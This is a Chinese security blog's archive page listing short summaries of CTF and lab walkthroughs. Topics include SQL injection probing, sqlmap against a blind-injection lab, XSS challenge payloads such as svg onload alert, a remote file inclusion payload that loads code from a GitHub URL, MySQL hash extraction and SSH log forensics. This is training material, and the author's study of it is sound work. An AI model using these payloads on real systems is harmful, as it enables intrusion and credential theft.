04 2019 档案

摘要:PHP中异或 (^) 的概念 <?php echo"A"^"?";?> <?php echo"A"^"?";?> 输出的结果是字符 “~”,这是因为代码对字符 “A” 和字符 “?” 进行了异或操作。在 PHP 中两个变量进行异或时,会先将字符串转换成 ASCII 值,再将 阅读全文
posted @ 2019-04-29 16:04 APT-101 阅读(702) 评论(0) 推荐(0) 编辑
摘要:具体的获取方法: 1)通过hex 十六进制的工具打开user.MYD文件 这里使用:0XED 2)复制MySQL密码出来,进行分析 *CEAF6E9FA3A448A25AC9D00C8D7078385 #33位 前面带*号说明是40位加密把所有的密文hash全部列出来 6B54FBC #七位 has 阅读全文
posted @ 2019-04-29 15:16 APT-101 阅读(2537) 评论(0) 推荐(0) 编辑
摘要:概述: 判断注入点: http://www.xxxxx.com/page.php?pid=42 and 1=1 #true http://www.xxxxx.com/page.php?pid=42 and 1=2 #false 猜表的列数 http://www.xxxxx.com/page.php? 阅读全文
posted @ 2019-04-24 09:00 APT-101 阅读(1991) 评论(0) 推荐(0) 编辑
摘要:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 分析题目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!! sqlmap -u "http://219.153 阅读全文
posted @ 2019-04-23 11:19 APT-101 阅读(1034) 评论(0) 推荐(0) 编辑
摘要:https://xss-game.appspot.com/level1 https://xss-game.appspot.com/level1 payload: <svg onload=alert(1)> https://xss-game.appspot.com/level2 过滤掉了<script 阅读全文
posted @ 2019-04-22 16:11 APT-101 阅读(570) 评论(0) 推荐(0) 编辑
摘要:https://alf.nu/alert1 warmup adobe JSON 阅读全文
posted @ 2019-04-20 18:25 APT-101 阅读(329) 评论(0) 推荐(0) 编辑
摘要:概述: https://xss-quiz.int21h.jp/ Stage #1 payload: <script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed 阅读全文
posted @ 2019-04-19 19:07 APT-101 阅读(2256) 评论(0) 推荐(1) 编辑
摘要:http://www.zixem.altervista.org/RCE/level1.php 构造payload: https://zixem.altervista.org/RCE/level1.php?page=https://raw.githubusercontent.com/pipter/SR 阅读全文
posted @ 2019-04-19 09:48 APT-101 阅读(322) 评论(0) 推荐(0) 编辑
摘要:Case 23 - DOM Injection via URL parameter (by server + client) https://brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)> https://brutelogic. 阅读全文
posted @ 2019-04-17 16:35 APT-101 阅读(489) 评论(0) 推荐(0) 编辑
摘要:Case 14 - Double Injection in HTML Context with Double Quotes https://brutelogic.com.br/multi/double-html.php?p="</a><svg onload=alert(1)> Case 15 - D 阅读全文
posted @ 2019-04-17 11:25 APT-101 阅读(460) 评论(0) 推荐(0) 编辑
摘要:Single Reflection Case 01 - Direct URL Injection (no parameter) payload: https://brutelogic.com.br/xss.php/"><script>alert(1)</script> https://brutelo 阅读全文
posted @ 2019-04-16 09:45 APT-101 阅读(271) 评论(0) 推荐(0) 编辑
摘要:1. URL Reflection 当URL以某种方式反映在源代码中时,我们可以添加自己的XSS向量/有效负载。对于PHP页面,可以使用斜杠字符(/)在页面名称之后添加任何内容 http://brutelogic.com.br/xss.php/”><svg onload=alert(1)> 需要使用 阅读全文
posted @ 2019-04-15 10:19 APT-101 阅读(1714) 评论(0) 推荐(0) 编辑
摘要:在线靶场: https://www.mozhe.cn 背景介绍 某运维人员发现服务器最近被一个IP连接过SSH,请找到连接服务器SSH的IP。 实训目标 1、了解Linux备份方式; 2、了解AccessData FTK Imager使用方法; 3、掌握如何查看Linux日志; 解题方向 根据备份文 阅读全文
posted @ 2019-04-13 17:08 APT-101 阅读(869) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示